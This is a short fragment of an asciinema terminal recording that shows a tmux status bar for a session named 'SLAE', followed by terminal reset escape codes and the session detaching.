[55.446951, "o", "\u001b[?25l\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[32;4H\u001b[?12l\u001b[?25h"]
[55.447781, "o", "\u001b[1;33r"]
[55.448158, "o", "\u001b(B\u001b[m"]
[55.448432, "o", "\u001b[?1l\u001b>"]
[55.450279, "o", "\u001b[H\u001b[2J\u001b[?2004l\u001b]112\u0007\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1006l\u001b[?1005l\u001b[?1004l\u001b[?1049l\u001b[23;0;0t[detached (from session SLAE)]\r\n"]
